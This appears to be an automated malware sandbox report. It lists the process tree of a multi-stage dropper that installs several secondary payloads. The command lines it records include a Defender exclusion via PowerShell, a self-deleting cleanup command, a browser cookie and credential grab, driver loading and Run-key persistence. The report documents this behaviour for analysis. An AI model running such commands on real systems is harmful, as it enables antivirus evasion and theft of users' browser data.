MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMaskVPNUpdate.execmd.execmd.execmd.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
2396
16852	MicrosoftEdge.exe
3128	MicrosoftEdgeCP.exe
3128	MicrosoftEdgeCP.exe
5260	MicrosoftEdge.exe
8960	MicrosoftEdgeCP.exe
8960	MicrosoftEdgeCP.exe
12640	MaskVPNUpdate.exe
7300	cmd.exe
12856	cmd.exe
4796	cmd.exe
13208	MicrosoftEdge.exe
13744	MicrosoftEdgeCP.exe
13744	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2396

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup3310.exeSetup3310.tmpSetup.exeSetup.tmpDelta.exeDelta.tmpPictureLAb.exePictureLAb.tmpSetup.exeSetup.tmpHGT.exeprolab.exeSetup.execmd.exeRugomaevoki.execmd.exegaooo.exehjjgaa.exe

description	pid	process	target process
PID 1108 wrote to memory of 3664	1108	Setup3310.exe	Setup3310.tmp
PID 1108 wrote to memory of 3664	1108	Setup3310.exe	Setup3310.tmp
PID 1108 wrote to memory of 3664	1108	Setup3310.exe	Setup3310.tmp
PID 3664 wrote to memory of 3796	3664	Setup3310.tmp	Setup.exe
PID 3664 wrote to memory of 3796	3664	Setup3310.tmp	Setup.exe
PID 3664 wrote to memory of 3796	3664	Setup3310.tmp	Setup.exe
PID 3796 wrote to memory of 644	3796	Setup.exe	Setup.tmp
PID 3796 wrote to memory of 644	3796	Setup.exe	Setup.tmp
PID 3796 wrote to memory of 644	3796	Setup.exe	Setup.tmp
PID 644 wrote to memory of 2112	644	Setup.tmp	Delta.exe
PID 644 wrote to memory of 2112	644	Setup.tmp	Delta.exe
PID 644 wrote to memory of 2112	644	Setup.tmp	Delta.exe
PID 2112 wrote to memory of 208	2112	Delta.exe	Delta.tmp
PID 2112 wrote to memory of 208	2112	Delta.exe	Delta.tmp
PID 2112 wrote to memory of 208	2112	Delta.exe	Delta.tmp
PID 208 wrote to memory of 1364	208	Delta.tmp	Setup.exe
PID 208 wrote to memory of 1364	208	Delta.tmp	Setup.exe
PID 208 wrote to memory of 1364	208	Delta.tmp	Setup.exe
PID 644 wrote to memory of 1852	644	Setup.tmp	PictureLAb.exe
PID 644 wrote to memory of 1852	644	Setup.tmp	PictureLAb.exe
PID 644 wrote to memory of 1852	644	Setup.tmp	PictureLAb.exe
PID 1852 wrote to memory of 1576	1852	PictureLAb.exe	PictureLAb.tmp
PID 1852 wrote to memory of 1576	1852	PictureLAb.exe	PictureLAb.tmp
PID 1852 wrote to memory of 1576	1852	PictureLAb.exe	PictureLAb.tmp
PID 1576 wrote to memory of 1512	1576	PictureLAb.tmp	Setup.exe
PID 1576 wrote to memory of 1512	1576	PictureLAb.tmp	Setup.exe
PID 1576 wrote to memory of 1512	1576	PictureLAb.tmp	Setup.exe
PID 1512 wrote to memory of 1856	1512	Setup.exe	Setup.tmp
PID 1512 wrote to memory of 1856	1512	Setup.exe	Setup.tmp
PID 1512 wrote to memory of 1856	1512	Setup.exe	Setup.tmp
PID 1856 wrote to memory of 2520	1856	Setup.tmp	HGT.exe
PID 1856 wrote to memory of 2520	1856	Setup.tmp	HGT.exe
PID 2520 wrote to memory of 3024	2520	HGT.exe	prolab.exe
PID 2520 wrote to memory of 3024	2520	HGT.exe	prolab.exe
PID 2520 wrote to memory of 3024	2520	HGT.exe	prolab.exe
PID 2520 wrote to memory of 1352	2520	HGT.exe	Rugomaevoki.exe
PID 2520 wrote to memory of 1352	2520	HGT.exe	Rugomaevoki.exe
PID 3024 wrote to memory of 2688	3024	prolab.exe	prolab.tmp
PID 3024 wrote to memory of 2688	3024	prolab.exe	prolab.tmp
PID 3024 wrote to memory of 2688	3024	prolab.exe	prolab.tmp
PID 1364 wrote to memory of 904	1364	Setup.exe	cmd.exe
PID 1364 wrote to memory of 904	1364	Setup.exe	cmd.exe
PID 1364 wrote to memory of 904	1364	Setup.exe	cmd.exe
PID 904 wrote to memory of 1516	904	cmd.exe	taskkill.exe
PID 904 wrote to memory of 1516	904	cmd.exe	taskkill.exe
PID 904 wrote to memory of 1516	904	cmd.exe	taskkill.exe
PID 904 wrote to memory of 500	904	cmd.exe	timeout.exe
PID 904 wrote to memory of 500	904	cmd.exe	timeout.exe
PID 904 wrote to memory of 500	904	cmd.exe	timeout.exe
PID 1352 wrote to memory of 8896	1352	Rugomaevoki.exe	cmd.exe
PID 1352 wrote to memory of 8896	1352	Rugomaevoki.exe	cmd.exe
PID 8896 wrote to memory of 10336	8896	cmd.exe	gaooo.exe
PID 8896 wrote to memory of 10336	8896	cmd.exe	gaooo.exe
PID 8896 wrote to memory of 10336	8896	cmd.exe	gaooo.exe
PID 10336 wrote to memory of 11768	10336	gaooo.exe	jfiag3g_gg.exe
PID 10336 wrote to memory of 11768	10336	gaooo.exe	jfiag3g_gg.exe
PID 10336 wrote to memory of 11768	10336	gaooo.exe	jfiag3g_gg.exe
PID 644 wrote to memory of 15888	644	Setup.tmp	hjjgaa.exe
PID 644 wrote to memory of 15888	644	Setup.tmp	hjjgaa.exe
PID 644 wrote to memory of 15888	644	Setup.tmp	hjjgaa.exe
PID 15888 wrote to memory of 16056	15888	hjjgaa.exe	jfiag3g_gg.exe
PID 15888 wrote to memory of 16056	15888	hjjgaa.exe	jfiag3g_gg.exe
PID 15888 wrote to memory of 16056	15888	hjjgaa.exe	jfiag3g_gg.exe
PID 10336 wrote to memory of 17340	10336	gaooo.exe	jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Users\Admin\AppData\Local\Temp\is-KJI8I.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KJI8I.tmp\Setup3310.tmp" /SL5="$20118,138429,56832,C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3664

C:\Users\Admin\AppData\Local\Temp\is-L6H0P.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-L6H0P.tmp\Setup.exe" /Verysilent
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3796

C:\Users\Admin\AppData\Local\Temp\is-7D3TQ.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7D3TQ.tmp\Setup.tmp" /SL5="$20206,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-L6H0P.tmp\Setup.exe" /Verysilent
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:644

C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\Delta.exe" /Verysilent
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2112

C:\Users\Admin\AppData\Local\Temp\is-ONETG.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ONETG.tmp\Delta.tmp" /SL5="$201F4,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\Delta.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:208

C:\Users\Admin\AppData\Local\Temp\is-GOAJI.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GOAJI.tmp\Setup.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-GOAJI.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
8⤵
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
9⤵
- Delays execution with timeout.exe
PID:500

C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\PictureLAb.exe" /Verysilent
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1852

C:\Users\Admin\AppData\Local\Temp\is-CDM2Q.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CDM2Q.tmp\PictureLAb.tmp" /SL5="$301F4,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\PictureLAb.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1576

C:\Users\Admin\AppData\Local\Temp\is-5REP7.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-5REP7.tmp\Setup.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1512

C:\Users\Admin\AppData\Local\Temp\is-5JLPF.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5JLPF.tmp\Setup.tmp" /SL5="$60074,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-5REP7.tmp\Setup.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1856

C:\Users\Admin\AppData\Local\Temp\is-E3EBL.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-E3EBL.tmp\HGT.exe" /S /UID=lab214
9⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2520

C:\Program Files\Common Files\GUNZKFQBZY\prolab.exe
"C:\Program Files\Common Files\GUNZKFQBZY\prolab.exe" /VERYSILENT
10⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3024

C:\Users\Admin\AppData\Local\Temp\is-KKDDV.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KKDDV.tmp\prolab.tmp" /SL5="$401D2,575243,216576,C:\Program Files\Common Files\GUNZKFQBZY\prolab.exe" /VERYSILENT
11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2688

C:\Users\Admin\AppData\Local\Temp\35-43ad2-831-227be-d7f3b9ae474a2\Rugomaevoki.exe
"C:\Users\Admin\AppData\Local\Temp\35-43ad2-831-227be-d7f3b9ae474a2\Rugomaevoki.exe"
10⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0ufg3oy.k3m\gaooo.exe & exit
11⤵
- Suspicious use of WriteProcessMemory
PID:8896

C:\Users\Admin\AppData\Local\Temp\f0ufg3oy.k3m\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\f0ufg3oy.k3m\gaooo.exe
12⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:10336

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
- Executes dropped EXE
PID:11768

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
- Executes dropped EXE
PID:17340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nwf1xvbe.fiu\md7_7dfj.exe & exit
11⤵
PID:1168

C:\Users\Admin\AppData\Local\Temp\nwf1xvbe.fiu\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\nwf1xvbe.fiu\md7_7dfj.exe
12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\znhtj3hc.0po\askinstall29.exe & exit
11⤵
PID:7456

C:\Users\Admin\AppData\Local\Temp\znhtj3hc.0po\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\znhtj3hc.0po\askinstall29.exe
12⤵
- Executes dropped EXE
PID:7620

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
13⤵
PID:9564

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
14⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9748

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dpllrgre.1a5\customer4.exe & exit
11⤵
PID:14076

C:\Users\Admin\AppData\Local\Temp\dpllrgre.1a5\customer4.exe
C:\Users\Admin\AppData\Local\Temp\dpllrgre.1a5\customer4.exe
12⤵
- Executes dropped EXE
PID:14212

C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:14492

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b firefox
14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5000

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b chrome
14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5024

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b edge
14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5052

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d5t4jeai.5ex\HookSetp.exe & exit
11⤵
PID:14808

C:\Users\Admin\AppData\Local\Temp\d5t4jeai.5ex\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\d5t4jeai.5ex\HookSetp.exe
12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:14884

C:\ProgramData\8445151.92
"C:\ProgramData\8445151.92"
13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:15416

C:\ProgramData\4620154.50
"C:\ProgramData\4620154.50"
13⤵
- Executes dropped EXE
- Adds Run key to start application
PID:15464

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
14⤵
- Executes dropped EXE
PID:15676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uyzexdzq.pyc\GcleanerWW.exe /mixone & exit
11⤵
PID:968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exe & exit
11⤵
PID:15188

C:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exe
12⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:15252

C:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exe
13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:15656

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lipi2jdf.nbv\setup.exe /8-2222 & exit
11⤵
PID:15908

C:\Users\Admin\AppData\Local\Temp\lipi2jdf.nbv\setup.exe
C:\Users\Admin\AppData\Local\Temp\lipi2jdf.nbv\setup.exe /8-2222
12⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:15944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Hidden-Thunder"
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:16016

C:\Program Files (x86)\Hidden-Thunder\7za.exe
"C:\Program Files (x86)\Hidden-Thunder\7za.exe" e -p154.61.71.51 winamp-plugins.7z
13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4276

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Hidden-Thunder\setup.exe" -map "C:\Program Files (x86)\Hidden-Thunder\WinmonProcessMonitor.sys""
13⤵
PID:6228

C:\Program Files (x86)\Hidden-Thunder\setup.exe
"C:\Program Files (x86)\Hidden-Thunder\setup.exe" -map "C:\Program Files (x86)\Hidden-Thunder\WinmonProcessMonitor.sys"
14⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
PID:6528

C:\Program Files (x86)\Hidden-Thunder\7za.exe
"C:\Program Files (x86)\Hidden-Thunder\7za.exe" e -p154.61.71.51 winamp.7z
13⤵
- Executes dropped EXE
PID:6968

C:\Program Files (x86)\Hidden-Thunder\setup.exe
"C:\Program Files (x86)\Hidden-Thunder\setup.exe" /8-2222
13⤵
PID:7968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4xluz2fh.ope\MultitimerFour.exe & exit
11⤵
PID:16004

C:\Users\Admin\AppData\Local\Temp\4xluz2fh.ope\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\4xluz2fh.ope\MultitimerFour.exe
12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:16188

C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
13⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:16376

C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe" 1 3.1616085481.605381e99dd96 104
14⤵
- Executes dropped EXE
- Adds Run key to start application
PID:17124

C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe" 2 3.1616085481.605381e99dd96
15⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:17252

C:\Users\Admin\AppData\Local\Temp\1yf4bjuo5ps\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\1yf4bjuo5ps\Setup3310.exe" /Verysilent /subid=577
16⤵
- Executes dropped EXE
PID:4848

C:\Users\Admin\AppData\Local\Temp\is-8Q1VS.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8Q1VS.tmp\Setup3310.tmp" /SL5="$B00FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\1yf4bjuo5ps\Setup3310.exe" /Verysilent /subid=577
17⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5184

C:\Users\Admin\AppData\Local\Temp\is-GNJA5.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GNJA5.tmp\Setup.exe" /Verysilent
18⤵
- Executes dropped EXE
PID:6668

C:\Users\Admin\AppData\Local\Temp\is-5T8P5.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5T8P5.tmp\Setup.tmp" /SL5="$30512,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-GNJA5.tmp\Setup.exe" /Verysilent
19⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6720

C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\Delta.exe" /Verysilent
20⤵
PID:8436

C:\Users\Admin\AppData\Local\Temp\is-DAU6A.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DAU6A.tmp\Delta.tmp" /SL5="$10592,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\Delta.exe" /Verysilent
21⤵
- Loads dropped DLL
PID:8460

C:\Users\Admin\AppData\Local\Temp\is-49B44.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-49B44.tmp\Setup.exe" /VERYSILENT
22⤵
- Loads dropped DLL
- Checks processor information in registry
PID:8816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-49B44.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
23⤵
PID:9184

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
24⤵
- Kills process with taskkill
PID:9292

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
24⤵
- Delays execution with timeout.exe
PID:9380

C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\PictureLAb.exe" /Verysilent
20⤵
PID:8828

C:\Users\Admin\AppData\Local\Temp\is-SCS2H.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SCS2H.tmp\PictureLAb.tmp" /SL5="$20592,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\PictureLAb.exe" /Verysilent
21⤵
- Loads dropped DLL
PID:8872

C:\Users\Admin\AppData\Local\Temp\is-LMCGU.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-LMCGU.tmp\Setup.exe" /VERYSILENT
22⤵
PID:7396

C:\Users\Admin\AppData\Local\Temp\is-K5I0T.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-K5I0T.tmp\Setup.tmp" /SL5="$40496,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-LMCGU.tmp\Setup.exe" /VERYSILENT
23⤵
- Loads dropped DLL
PID:7420

C:\Users\Admin\AppData\Local\Temp\is-SJ034.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-SJ034.tmp\HGT.exe" /S /UID=lab214
24⤵
- Drops file in Drivers directory
PID:7736

C:\Users\Admin\AppData\Local\Temp\c7-e2bf3-4fb-2079a-2217a68f222c0\Pyshaepudaeho.exe
"C:\Users\Admin\AppData\Local\Temp\c7-e2bf3-4fb-2079a-2217a68f222c0\Pyshaepudaeho.exe"
25⤵
PID:8988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\be30kosd.c03\gaooo.exe & exit
26⤵
PID:15004

C:\Users\Admin\AppData\Local\Temp\be30kosd.c03\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\be30kosd.c03\gaooo.exe
27⤵
PID:15052

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
28⤵
PID:2160

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
28⤵
PID:12636

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4y3hdf53.bfu\md7_7dfj.exe & exit
26⤵
PID:8480

C:\Users\Admin\AppData\Local\Temp\4y3hdf53.bfu\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\4y3hdf53.bfu\md7_7dfj.exe
27⤵
- Checks whether UAC is enabled
PID:7992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ekdm0gsf.lrq\askinstall29.exe & exit
26⤵
PID:10084

C:\Users\Admin\AppData\Local\Temp\ekdm0gsf.lrq\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\ekdm0gsf.lrq\askinstall29.exe
27⤵
PID:10496

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
28⤵
PID:10720

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
29⤵
- Kills process with taskkill
PID:2324

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ncot2bil.hwx\customer4.exe & exit
26⤵
PID:13808

C:\Users\Admin\AppData\Local\Temp\ncot2bil.hwx\customer4.exe
C:\Users\Admin\AppData\Local\Temp\ncot2bil.hwx\customer4.exe
27⤵
PID:13852

C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
28⤵
- Loads dropped DLL
PID:14024

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0sl4kuco.aee\HookSetp.exe & exit
26⤵
PID:14348

C:\Users\Admin\AppData\Local\Temp\0sl4kuco.aee\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\0sl4kuco.aee\HookSetp.exe
27⤵
PID:14652

C:\ProgramData\5821330.64
"C:\ProgramData\5821330.64"
28⤵
PID:15844

C:\ProgramData\4536431.49
"C:\ProgramData\4536431.49"
28⤵
- Suspicious behavior: SetClipboardViewer
PID:16076

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzyq113l.asr\GcleanerWW.exe /mixone & exit
26⤵
PID:7792

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exe & exit
26⤵
PID:15248

C:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exe
27⤵
- Suspicious use of SetThreadContext
PID:15748

C:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exe
28⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
PID:5364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4z3xslt.e2o\setup.exe /8-2222 & exit
26⤵
PID:14632

C:\Users\Admin\AppData\Local\Temp\q4z3xslt.e2o\setup.exe
C:\Users\Admin\AppData\Local\Temp\q4z3xslt.e2o\setup.exe /8-2222
27⤵
- Loads dropped DLL
- Drops file in Program Files directory
PID:2628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wispy-Brook"
28⤵
PID:15296

C:\Program Files (x86)\Wispy-Brook\7za.exe
"C:\Program Files (x86)\Wispy-Brook\7za.exe" e -p154.61.71.51 winamp-plugins.7z
28⤵
- Drops file in Program Files directory
PID:8524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wispy-Brook\setup.exe" -map "C:\Program Files (x86)\Wispy-Brook\WinmonProcessMonitor.sys""
28⤵
PID:16756

C:\Program Files (x86)\Wispy-Brook\setup.exe
"C:\Program Files (x86)\Wispy-Brook\setup.exe" -map "C:\Program Files (x86)\Wispy-Brook\WinmonProcessMonitor.sys"
29⤵
- Suspicious behavior: LoadsDriver
PID:9816

C:\Program Files (x86)\Wispy-Brook\7za.exe
"C:\Program Files (x86)\Wispy-Brook\7za.exe" e -p154.61.71.51 winamp.7z
28⤵
PID:10280

C:\Program Files (x86)\Wispy-Brook\setup.exe
"C:\Program Files (x86)\Wispy-Brook\setup.exe" /8-2222
28⤵
PID:11200

C:\Program Files (x86)\Wispy-Brook\setup.exe
"C:\Program Files (x86)\Wispy-Brook\setup.exe" /8-2222
29⤵
PID:14308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\444jesi0.yu5\MultitimerFour.exe & exit
26⤵
PID:16420

C:\Users\Admin\AppData\Local\Temp\444jesi0.yu5\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\444jesi0.yu5\MultitimerFour.exe
27⤵
PID:16392

C:\Users\Admin\AppData\Local\Temp\RHDD1JFYQJ\setups.exe
